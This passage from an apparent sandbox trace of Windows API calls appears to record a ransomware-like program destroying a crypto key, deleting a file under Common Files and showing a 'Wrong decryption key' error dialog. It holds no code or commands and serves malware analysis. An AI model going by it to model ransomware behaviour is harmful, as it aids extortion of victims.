(in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1820 | out: hHeap=0xc60000) returned 1 [0264.901] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17d0 | out: hHeap=0xc60000) returned 1 [0264.901] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xef1de0 [0264.901] PeekMessageW (in: lpMsg=0x91faac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91faac) returned 0 [0264.901] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef17d0 [0264.901] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20a) returned 0xca7380 [0264.901] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1820 [0264.901] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca7380 | out: hHeap=0xc60000) returned 1 [0264.901] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1820 | out: hHeap=0xc60000) returned 1 [0264.901] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1820 [0264.901] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x18) returned 0xeca7d8 [0264.901] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeca7d8 | out: hHeap=0xc60000) returned 1 [0264.901] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1820 | out: hHeap=0xc60000) returned 1 [0264.901] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17d0 | out: hHeap=0xc60000) returned 1 [0264.901] PeekMessageW (in: lpMsg=0x91faac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91faac) returned 0 [0264.901] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef17d0 [0264.901] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20a) returned 0xca7380 [0264.901] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1820 [0264.901] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca7380 | out: hHeap=0xc60000) returned 1 [0264.901] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1820 | out: hHeap=0xc60000) returned 1 [0264.901] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17d0 | out: hHeap=0xc60000) returned 1 [0264.901] PeekMessageW (in: lpMsg=0x91faac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91faac) returned 0 [0264.901] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef17d0 [0264.901] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17d0 | out: hHeap=0xc60000) returned 1 [0264.902] PeekMessageW (in: lpMsg=0x91faac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91faac) returned 0 [0264.902] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1de0 | out: hHeap=0xc60000) returned 1 [0264.902] PeekMessageW (in: lpMsg=0x91faac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91faac) returned 0 [0264.902] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb4f8 [0264.902] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe837d8 [0264.902] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef17d0 [0264.902] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17d0 | out: hHeap=0xc60000) returned 1 [0264.902] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83598 [0264.902] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef17d0 [0264.902] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17d0 | out: hHeap=0xc60000) returned 1 [0264.902] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef17d0 [0264.902] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1820 [0264.902] WriteFile (in: hFile=0x5e8, lpBuffer=0xef17d0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x91f964, lpOverlapped=0x0 | out: lpBuffer=0xef17d0*, lpNumberOfBytesWritten=0x91f964*=0x4, lpOverlapped=0x0) returned 1 [0264.904] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe837d8 | out: hHeap=0xc60000) returned 1 [0264.904] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17d0 | out: hHeap=0xc60000) returned 1 [0264.904] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1820 | out: hHeap=0xc60000) returned 1 [0264.904] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83598 | out: hHeap=0xc60000) returned 1 [0264.904] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb4f8 | out: hHeap=0xc60000) returned 1 [0264.904] PeekMessageW (in: lpMsg=0x91faac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91faac) returned 0 [0264.904] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1820 [0264.904] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1820 | out: hHeap=0xc60000) returned 1 [0264.904] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1da0 | out: hHeap=0xc60000) returned 1 [0264.904] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1ce0 | out: hHeap=0xc60000) returned 1 [0264.904] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1c20 | out: hHeap=0xc60000) returned 1 [0264.904] PeekMessageW (in: lpMsg=0x91faac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91faac) returned 0 [0264.904] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1820 [0264.904] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef17d0 [0264.904] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x18) returned 0xeca7d8 [0264.904] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeca7d8 | out: hHeap=0xc60000) returned 1 [0264.904] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17d0 | out: hHeap=0xc60000) returned 1 [0264.904] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1820 | out: hHeap=0xc60000) returned 1 [0264.904] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb4f8 [0264.904] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe83598 [0264.904] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe837d8 [0264.904] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe80fd0 [0264.904] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe81090 [0264.904] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe81000 [0264.904] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe81420 [0264.904] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe83568 [0264.904] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1820 [0264.904] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xee0cf0 [0264.904] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0264.904] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xee0cf0 | out: hHeap=0xc60000) returned 1 [0264.904] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1820 | out: hHeap=0xc60000) returned 1 [0264.905] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb4d0 [0264.905] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x1) returned 0xef1820 [0264.905] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb818 [0264.905] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83418 [0264.905] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef17d0 [0264.905] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17d0 | out: hHeap=0xc60000) returned 1 [0264.905] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe83430 [0264.905] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb7c8 [0264.905] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83610 [0264.905] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef17d0 [0264.905] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83610 | out: hHeap=0xc60000) returned 1 [0264.905] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb7f0 [0264.905] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83610 [0264.905] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xe8c838 [0264.905] PeekMessageW (in: lpMsg=0x91f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f78c) returned 0 [0264.905] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb570 [0264.905] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe835b0 [0264.905] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef16e0 [0264.905] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83520 [0264.905] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83508 [0264.905] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef17b0 [0264.905] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83508 | out: hHeap=0xc60000) returned 1 [0264.905] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb6d8 [0264.905] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83508 [0264.905] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef16b0 [0264.906] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1760 [0264.906] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xee0cf0 [0264.906] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0264.906] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xee0cf0 | out: hHeap=0xc60000) returned 1 [0264.906] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1760 | out: hHeap=0xc60000) returned 1 [0264.906] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe83730 [0264.906] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xe8c880 [0264.906] PeekMessageW (in: lpMsg=0x91f13c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f13c) returned 0 [0264.906] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1760 [0264.906] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef17c0 [0264.906] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17c0 | out: hHeap=0xc60000) returned 1 [0264.906] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1760 | out: hHeap=0xc60000) returned 1 [0264.906] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe8c880 | out: hHeap=0xc60000) returned 1 [0264.906] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83730 | out: hHeap=0xc60000) returned 1 [0264.907] CryptDestroyKey (hKey=0xef1d60) returned 1 [0264.907] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1640 [0264.907] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x214) returned 0xca7380 [0264.907] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1700 [0264.907] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe80eb0 [0264.907] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83550 [0264.907] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe80ee0 [0264.907] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1760 [0264.907] CryptReleaseContext (hProv=0xcc72b8, dwFlags=0x0) returned 1 [0264.907] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1740 [0264.907] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x214) returned 0xca7380 [0264.907] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe83718 [0264.908] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83610 [0264.908] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe835c8 [0264.908] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe81030 [0264.908] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef16e0 [0264.908] FreeLibrary (hLibModule=0x74f20000) returned 1 [0264.909] GetFullPathNameW (in: lpFileName="C:\\PROGRA~2\\COMMON~1\\2620738370", nBufferLength=0x7fff, lpBuffer=0x90f960, lpFilePart=0x0 | out: lpBuffer="C:\\PROGRA~2\\COMMON~1\\2620738370", lpFilePart=0x0) returned 0x1f [0264.910] FindFirstFileW (in: lpFileName="C:\\PROGRA~2\\COMMON~1\\2620738370", lpFindFileData=0x91f9a8 | out: lpFindFileData=0x91f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36ba8410, ftCreationTime.dwHighDateTime=0x1d661be, ftLastAccessTime.dwLowDateTime=0x3f48b390, ftLastAccessTime.dwHighDateTime=0x1d661be, ftLastWriteTime.dwLowDateTime=0x3f4cd240, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x4, dwReserved0=0x91f9e0, dwReserved1=0x759a14dd, cFileName="2620738370", cAlternateFileName="262073~2")) returned 0xef1c60 [0264.910] DeleteFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\2620738370" (normalized: "c:\\progra~2\\common~1\\2620738370")) returned 1 [0264.914] FindNextFileW (in: hFindFile=0xef1c60, lpFindFileData=0x91f9a8 | out: lpFindFileData=0x91f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36ba8410, ftCreationTime.dwHighDateTime=0x1d661be, ftLastAccessTime.dwLowDateTime=0x3f48b390, ftLastAccessTime.dwHighDateTime=0x1d661be, ftLastWriteTime.dwLowDateTime=0x3f4cd240, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x4, dwReserved0=0x91f9e0, dwReserved1=0x759a14dd, cFileName="2620738370", cAlternateFileName="262073~2")) returned 0 [0264.914] FindClose (in: hFindFile=0xef1c60 | out: hFindFile=0xef1c60) returned 1 [0264.914] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xee0cb8 | out: hHeap=0xc60000) returned 1 [0264.914] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1930 | out: hHeap=0xc60000) returned 1 [0264.914] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe811b0 | out: hHeap=0xc60000) returned 1 [0264.914] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1920 | out: hHeap=0xc60000) returned 1 [0264.914] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe8c7f0 | out: hHeap=0xc60000) returned 1 [0264.914] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1910 | out: hHeap=0xc60000) returned 1 [0264.914] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xcc7230 | out: hHeap=0xc60000) returned 1 [0264.914] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1940 | out: hHeap=0xc60000) returned 1 [0264.914] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83b38 | out: hHeap=0xc60000) returned 1 [0264.914] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe813f0 | out: hHeap=0xc60000) returned 1 [0264.914] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb048 | out: hHeap=0xc60000) returned 1 [0264.914] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 1 [0264.914] TranslateAcceleratorW (hWnd=0x80170, hAccTable=0x150171, lpMsg=0x91fd04) returned 0 [0264.914] IsDialogMessageW (hDlg=0x80170, lpMsg=0x91fd04) returned 1 [0264.915] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0264.915] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb048 [0264.915] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe813f0 [0264.915] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1940 [0264.915] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1940 | out: hHeap=0xc60000) returned 1 [0264.915] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83b38 [0264.915] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1940 [0264.915] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe811b0 [0264.915] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1940 | out: hHeap=0xc60000) returned 1 [0264.915] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe81480 [0264.915] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1940 [0264.915] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe838f8 [0264.915] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1940 | out: hHeap=0xc60000) returned 1 [0264.915] MessageBoxW (hWnd=0x0, lpText="Wrong decryption key", lpCaption="Error!", uType=0x10010) returned 1 [0264.986] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.986] NtdllDialogWndProc_W () returned 0x1 [0264.989] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.989] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.989] NtdllDialogWndProc_W () returned 0x0 [0264.993] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.993] GetWindowLongW (hWnd=0x80170, nIndex=-20) returned 256 [0264.993] NtdllDialogWndProc_W () returned 0x1 [0264.993] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.993] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.993] GetClientRect (in: hWnd=0x80170, lpRect=0x91f680 | out: lpRect=0x91f680) returned 1 [0264.993] GetCursorPos (in: lpPoint=0x91f690 | out: lpPoint=0x91f690*(x=890, y=510)) returned 1 [0264.993] ScreenToClient (in: hWnd=0x80170, lpPoint=0x91f690 | out: lpPoint=0x91f690) returned 1 [0264.994] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0264.994] SetCursor (hCursor=0x10003) returned 0x10007 [0265.005] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0265.005] NtdllDialogWndProc_W () returned 0x0 [0265.006] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0265.006] NtdllDialogWndProc_W () returned 0x1 [0265.006] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0265.006] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0265.006] GetSysColor (nIndex=15) returned 0xf0f0f0 [0265.006] SetBkColor (hdc=0x39010722, color=0xf0f0f0) returned 0xf0f0f0 [0265.007] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0265.007] NtdllDialogWndProc_W () returned 0x0 [0265.007] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0265.007] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0265.007] GetSysColor (nIndex=15) returned 0xf0f0f0 [0265.007] SetBkColor (hdc=0x39010722, color=0xf0f0f0) returned 0xf0f0f0 [0265.007] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0265.007] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0265.007] GetWindowLongW (hWnd=0x6014c, nIndex=-21) returned 3 [0265.007] NtdllDialogWndProc_W () returned 0x0 [0265.007] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0265.007] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0265.007] GetWindowLongW (hWnd=0x6014c, nIndex=-21) returned 3 [0265.007] NtdllDialogWndProc_W () returned 0x0 [0265.008] GetForegroundWindow () returned 0xa014a [0265.008] GetWindowLongW (hWnd=0xa014a, nIndex=-21) returned 9567000 [0265.028] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0265.028] GetWindowLongW (hWnd=0x80170, nIndex=-20) returned 256 [0265.028] NtdllDialogWndProc_W () returned 0x1 [0265.029] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0265.029] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0265.029] GetClientRect (in: hWnd=0x80170, lpRect=0x91f680 | out: lpRect=0x91f680) returned 1 [0265.029] GetCursorPos (in: lpPoint=0x91f690 | out: lpPoint=0x91f690*(x=890, y=510)) returned 1 [0265.029] ScreenToClient (in: hWnd=0x80170, lpPoint=0x91f690 | out: lpPoint=0x91f690) returned 1 [0265.029] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0265.030] SetCursor (hCursor=0x10003) returned 0x10003 [0265.030] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0265.030] NtdllDialogWndProc_W () returned 0x0 [0265.031] GetForegroundWindow () returned 0xa014a [0265.031] GetWindowLongW (hWnd=0xa014a, nIndex=-21) returned 9567000 [0265.076] GetForegroundWindow () returned 0xa014a [0265.076] GetWindowLongW (hWnd=0xa014a, nIndex=-21) returned 9567000 [0265.116] GetForegroundWindow () returned 0xa014a [0265.116] GetWindowLongW (hWnd=0xa014a, nIndex=-21) returned 9567000 [0265.166] GetForegroundWindow () returned 0xa014a [0265.166] GetWindowLongW (hWnd=0xa014a, nIndex=-21) returned 9567000 [0265.217] GetForegroundWindow () returned 0xa014a [0265.217] GetWindowLongW (hWnd=0xa014a, nIndex=-21) returned 9567000 [0265.257] GetForegroundWindow () returned 0xa014a [0265.257] GetWindowLongW (hWnd=0xa014a, nIndex=-21) returned 9567000 [0265.320] GetForegroundWindow () returned 0xa014a [0265.320] GetWindowLongW (hWnd=0xa014a, nIndex=-21) returned 9567000 [0265.340] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0265.340] NtdllDialogWndProc_W () returned 0x0 [0265.340] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0265.340] NtdllDialogWndProc_W () returned 0x0 [0265.340] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0265.340] NtdllDialogWndProc_W () returned 0x0 [0265.341] NtdllDefWindowProc_W () returned 0x0 [0265.341] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0265.341] NtdllDialogWndProc_W () returned 0x1 [0265.342] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0265.342] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0265.342] NtdllDialogWndProc_W () returned 0x0 [0265.343] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe813f0 | out: hHeap=0xc60000) returned 1 [0265.343] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe811b0 | out: hHeap=0xc60000) returned 1 [0265.343] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83b38 | out: hHeap=0xc60000) returned 1 [0265.343] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe838f8 | out: hHeap=0xc60000) returned 1 [0265.343] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe81480 | out: hHeap=0xc60000) returned 1 [0265.343] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb048 | out: hHeap=0xc60000) returned 1 [0265.343] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 1 [0265.343] TranslateAcceleratorW (hWnd=0x80170, hAccTable=0x150171, lpMsg=0x91fd04) returned 0 [0265.343] TranslateMessage (lpMsg=0x91fd04) returned 0 [0265.343] DispatchMessageW (lpMsg=0x91fd04) returned 0x0 [0265.343] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 1 [0265.343] TranslateAcceleratorW (hWnd=0x80170, hAccTable=0x150171, lpMsg=0x91fd04) returned 0 [0265.344] TranslateMessage (lpMsg=0x91fd04) returned 0 [0265.344] DispatchMessageW (lpMsg=0x91fd04) returned 0x0 [0265.344] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 1 [0265.344] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0265.344] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0265.344] NtdllDialogWndProc_W () returned 0x0 [0265.344] TranslateAcceleratorW (hWnd=0x80170, hAccTable=0x150171, lpMsg=0x91fd04) returned 0 [0265.344] IsDialogMessageW (hDlg=0x80170, lpMsg=0x91fd04) returned 1 [0265.344] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 1 [0265.344] TranslateAcceleratorW (hWnd=0x80170, hAccTable=0x150171, lpMsg=0x91fd04) returned 0 [0265.344] IsDialogMessageW (hDlg=0x80170, lpMsg=0x91fd04) returned 1 [0265.354] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0265.354] NtdllDialogWndProc_W () returned 0x1 [0265.354] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0265.354] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0265.354] GetSysColor (nIndex=15) returned 0xf0f0f0 [0265.354] SetBkColor (hdc=0x3a010722, color=0xf0f0f0) returned 0xffffff [0265.354] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0265.354] NtdllDialogWndProc_W () returned 0x0 [0265.354] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0265.354] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0265.354] GetSysColor (nIndex=15) returned 0xf0f0f0 [0265.354] SetBkColor (hdc=0x3a010722, color=0xf0f0f0) returned 0xf0f0f0 [0265.355] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0265.355] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 